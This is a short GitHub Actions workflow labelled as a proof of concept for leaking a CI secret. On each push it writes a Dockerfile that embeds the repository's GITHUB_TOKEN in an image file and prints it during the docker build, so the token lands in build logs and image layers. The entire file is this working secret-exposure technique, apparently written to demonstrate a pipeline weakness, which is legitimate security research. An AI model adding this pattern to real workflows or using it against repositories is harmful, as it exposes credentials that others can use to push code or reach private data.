name: RCE Secret Leak PoC

on:
  push:

jobs:
  rce:
    runs-on: ubuntu-latest
    steps:
      - name: Checkout
        uses: actions/checkout@v2

      - name: Inject GITHUB_TOKEN into Dockerfile
        run: |
          echo -e "FROM alpine\nRUN echo '${{ secrets.GITHUB_TOKEN }}' > /leaked && cat /leaked" > Dockerfile

      - name: Build Dockerfile (Triggers Secret Leak)
        run: docker build -t test-image .
